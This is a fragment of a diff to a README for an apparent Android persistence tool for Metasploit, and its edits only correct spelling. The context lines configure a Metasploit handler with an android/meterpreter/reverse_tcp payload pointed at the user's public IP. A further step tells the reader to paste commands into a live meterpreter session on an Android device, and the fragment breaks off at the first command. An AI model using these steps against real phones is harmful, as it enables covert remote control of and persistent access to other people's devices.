koz243/msf-persistance-android/README.md

 use exploit/multi/handler
 set payload android/meterpreter/reverse_tcp
 set lhost YOUR IP PUBLIC
-set lport THE PORT OF YOUR CHOIX exploit
+set lport THE PORT OF YOUR CHOICE exploit
 ```

-3 - Copier/Paste in a terminal in shell MSF with a session android/meterpreter/reverse_tcp
+3 - Copie/Paste in a terminal in shell MSF with a session android/meterpreter/reverse_tcp

 ```
 cd /